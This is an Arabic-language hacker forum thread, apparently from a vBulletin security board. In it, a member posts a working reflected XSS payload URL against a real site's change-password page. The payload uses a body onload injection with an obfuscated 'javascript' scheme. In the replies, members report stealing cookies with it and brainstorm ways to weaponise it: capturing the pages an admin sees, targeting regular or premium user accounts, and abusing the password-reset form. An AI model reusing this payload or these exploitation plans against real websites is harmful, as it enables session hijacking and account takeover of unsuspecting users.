Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


برق الشمال عضو نشيط
  • شكراً: 74
  • تم شكره 128 مرة في 36 مشاركة

السلام عليكم ورحمة الله وبركاته

اليوم قمت بتفحص موقع الكيك المشهور :D

وحصلته مصاب بثغرة من نوع xss



فقلت ماتغلى على الحبايب


كود:
https://www.keek.com/change_password/%22%3E%3Cbody%20onload=%22javaاستبدال script:alert%28%27%D8%A8%D8%B1%D9%82%20%D8%A7%D9%84%D8%B4%D9%85%D8%A7%D9%84%27%29%22%3E%3Cform%20action=
بحثت عن شخص ممكن انه اكتشف الثغره من قبل ماوجدت


عشان اعرف يجون مطفين النور مليون شخص


المهم انا بريء من الاستغلال الخاطئ

16 أعضاء قالوا شكراً لـ برق الشمال على المشاركة المفيدة:
sazer_2010 عضو مميز
  • شكراً: 347
  • تم شكره 93 مرة في 25 مشاركة

هل الثغرة تعمل علي firefox فقط ام انا لدي مشكله

Dr.Mohamed Sec4Ever Team
  • شكراً: 1888
  • تم شكره 5755 مرة في 1425 مشاركة

جميل جدااااا
لكن للاسف مش متفرغ لاستغلالها ض1
راح يجي يومه ان شاء الله

توقيع
...........
برق الشمال عضو نشيط
  • شكراً: 74
  • تم شكره 128 مرة في 36 مشاركة

المشاركة الأصلية كتبت بواسطة sazer_2010 اقتباس :
هل الثغرة تعمل علي firefox فقط ام انا لدي مشكله
شغاله على الفايرفوكس اخر اصدار
وتم تطبيق الثغره وسحب الكوكيز


شرفني مرووركم جميعاً

Nani17
TeaM C
  • شكراً: 923
  • تم شكره 1035 مرة في 280 مشاركة

حلوة =d
الله يوفق الشباب فيها
الشغل مو تارك لنا مجال نتنفّس :'(

توقيع
------------------------------

يـا رَبّ
s4udiT3rr0rist S4E Team
  • شكراً: 644
  • تم شكره 977 مرة في 379 مشاركة

عجبتني فكرة
<form action=

توقيع

i-
Hmx-+On eht mic
p3rL
is My Lov3
المعرفة هي القوة ، وتقاسم المعرفة هي القوة المفقودة
knowledge is power, knowledge shared is power lost


Dr.Mohamed Sec4Ever Team
  • شكراً: 1888
  • تم شكره 5755 مرة في 1425 مشاركة

المشاركة الأصلية كتبت بواسطة s4udit3rr0rist اقتباس :
عجبتني فكرة
<form action=
تلك مجرد اضافة

ثغرات xss في السكربتات الخاصة فيها مشكل واحد وهو عدم معرفة هندسية الموقع وبالتالي صعوية الاستغلال
خصوصا انت مش عارف وش ممكن تجد داخل اللوحة

الحل :
فكرة ندونها قبل لا تنسى وهي عمل سكربت يعمل محاكات ماذا يحدث عند متصفح الادمن
مثال لما تدخل لوحة الموقع عن طريقة xss نعمل سكربت استقبال لمحتوى الصفحة

توقيع
...........
3 أعضاء قالوا شكراً لـ Dr.Mohamed على المشاركة المفيدة:
abdotv عضو مميز
  • شكراً: 57
  • تم شكره 204 مرة في 78 مشاركة

تطوير او تفكير سليم يمكن استغلالها في استعادة كلمة المرور

بعد اسعراض الرابط يظهر نمودج تعيين كلمة السر عن طريق وضع ايميل والباسورد مرتين

جربت اعمل استعادة لحساب لي لكن لم تنجح


تحياتي

s4udiT3rr0rist S4E Team
  • شكراً: 644
  • تم شكره 977 مرة في 379 مشاركة

المشاركة الأصلية كتبت بواسطة Massacreur اقتباس :
تلك مجرد اضافة

ثغرات xss في السكربتات الخاصة فيها مشكل واحد وهو عدم معرفة هندسية الموقع وبالتالي صعوية الاستغلال
خصوصا انت مش عارف وش ممكن تجد داخل اللوحة

الحل :
فكرة ندونها قبل لا تنسى وهي عمل سكربت يعمل محاكات ماذا يحدث عند متصفح الادمن
مثال لما تدخل لوحة الموقع عن طريقة xss نعمل سكربت استقبال لمحتوى الصفحة

راح يكون استهدافنا لل users وليس admin
في مواقع ك هاذه

توقيع

i-
Hmx-+On eht mic
p3rL
is My Lov3
المعرفة هي القوة ، وتقاسم المعرفة هي القوة المفقودة
knowledge is power, knowledge shared is power lost


برق الشمال عضو نشيط
  • شكراً: 74
  • تم شكره 128 مرة في 36 مشاركة

شرفني مروور الجميع

بالنسبه للادمن مثل المواقع هذي مثل ماتفضل الاخ

s4udiT3rr0rist



الاستهداف للحسابات المميزة او الفاحشه او غيرها


أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever